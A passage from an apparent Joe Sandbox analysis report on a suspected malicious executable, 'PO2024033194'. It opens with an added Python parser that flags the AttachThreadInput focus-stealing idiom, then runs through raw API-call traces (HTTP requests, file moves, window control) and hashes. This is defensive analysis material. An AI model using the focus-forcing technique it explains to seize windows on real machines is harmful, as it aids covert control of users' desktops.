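The entry above (call sites 00434643 to 00434712) shows the GetForegroundWindow, GetWindowThreadProcessId, AttachThreadInput(TRUE) ... AttachThreadInput(FALSE) sequence. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses the "APIs" listing format used in these entries (plain, subcall and argument-less lines), groups calls per function, and tags a function when it attaches its input queue to the foreground window's thread or drives a ListView control through LVM_* messages (LVM_FIRST = 0x1000). The sample input is constructed from API lines copied from two entries in this listing; the tag names are the example's own, not Joe Sandbox signature names.

```python
"""Parser for the Joe Sandbox 'APIs' listing format used in the entries above,
with a check for the AttachThreadInput attach/detach sequence. Added example;
not code from the report or from Joe Sandbox."""
import re
from dataclasses import dataclass
from typing import Optional

# One line of an 'APIs' block. The three shapes that occur in the listing:
#   • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
#   • _wcslen.LIBCMT ref: 00450720
#   • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

LVM_FIRST = 0x1000  # ListView control messages are LVM_FIRST + n


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # argument tokens as printed; '?' means unresolved
    ref: int                # call-site address from the 'ref:' field
    subcall: Optional[int]  # set for 'Part of subcall function X' lines


def parse_listing(text):
    """Return one list of ApiCall per 'APIs' header, in listing order.
    Other report lines (Strings, Memory Dump Source, hashes) are skipped."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            current.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                   int(m["sub"], 16) if m["sub"] else None))
    return functions


def window_messages(calls):
    """Sorted message ids passed as the second SendMessageW argument,
    skipping arguments the disassembler left as '?'."""
    ids = {int(c.args[1], 16) for c in calls
           if c.api == "SendMessageW" and len(c.args) > 1 and c.args[1] != "?"}
    return sorted(ids)


def attach_idiom(calls):
    """True when the function resolves the foreground window's thread and calls
    AttachThreadInput with fAttach=TRUE and later FALSE. While attached, focus
    and keyboard state are shared with that thread, which is how code forces
    SetForegroundWindow/SetFocus to succeed on a window it does not own."""
    names = {c.api for c in calls}
    if not {"GetForegroundWindow", "GetWindowThreadProcessId"} <= names:
        return False
    last = [c.args[-1] for c in calls if c.api == "AttachThreadInput" and c.args]
    return "00000001" in last and "00000000" in last


def flags(calls):
    """Tag names are this example's own, not Joe Sandbox signature names."""
    out = []
    if attach_idiom(calls):
        out.append("attach-foreground-thread-input")
    if any(LVM_FIRST <= m < LVM_FIRST + 0x100 for m in window_messages(calls)):
        out.append("listview-messages")
    return out


# Constructed sample: API lines copied from two entries in the listing above,
# trimmed, plus the surrounding report headers the parser has to skip.
SAMPLE = """\
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Strings
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Memory Dump Source
"""

if __name__ == "__main__":
    for i, fn in enumerate(parse_listing(SAMPLE), 1):
        print(f"function {i}: {len(fn)} calls, flags={flags(fn)}")
```

Feed it the text of a whole "Executed Functions" section to get one record per function; the regex deliberately ignores the Memory Dump Source, Similarity and hash lines, so the report can be pasted in unmodified. Unresolved arguments are kept as the literal "?" rather than guessed, which is why the second SendMessageW line in the sample contributes no message id.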
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                  • API String ID: 0-1603158881
                                                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                  • DestroyWindow.USER32(?), ref: 00426F50
                                                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                  • String ID: close all$#v
                                                                  • API String ID: 4174999648-3101823635
                                                                  • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                  • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                  APIs
                                                                  • CreateMenu.USER32 ref: 00448603
                                                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                  • IsMenu.USER32(?), ref: 004486AB
                                                                  • CreatePopupMenu.USER32 ref: 004486B5
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                  • DrawMenuBar.USER32 ref: 004486F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                  • String ID: 0
                                                                  • API String ID: 161812096-4108050209
                                                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                  • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                  APIs
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 978794511-0
                                                                  • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                  • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                  • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                  • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_memcmp
                                                                  • String ID: '$\$h
                                                                  • API String ID: 2205784470-1303700344
                                                                  • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                  • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                  • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                  • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                  • __swprintf.LIBCMT ref: 0045EC33
                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                  Strings
                                                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                  • String ID: %4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 2441338619-1568723262
                                                                  • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                  • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                  • String ID: @COM_EVENTOBJ
                                                                  • API String ID: 327565842-2228938565
                                                                  • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                  • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                  APIs
                                                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                  • String ID: H
                                                                  • API String ID: 3613100350-2852464175
                                                                  • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                  • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 1291720006-3916222277
                                                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                  • IsMenu.USER32(?), ref: 0045FC5F
                                                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
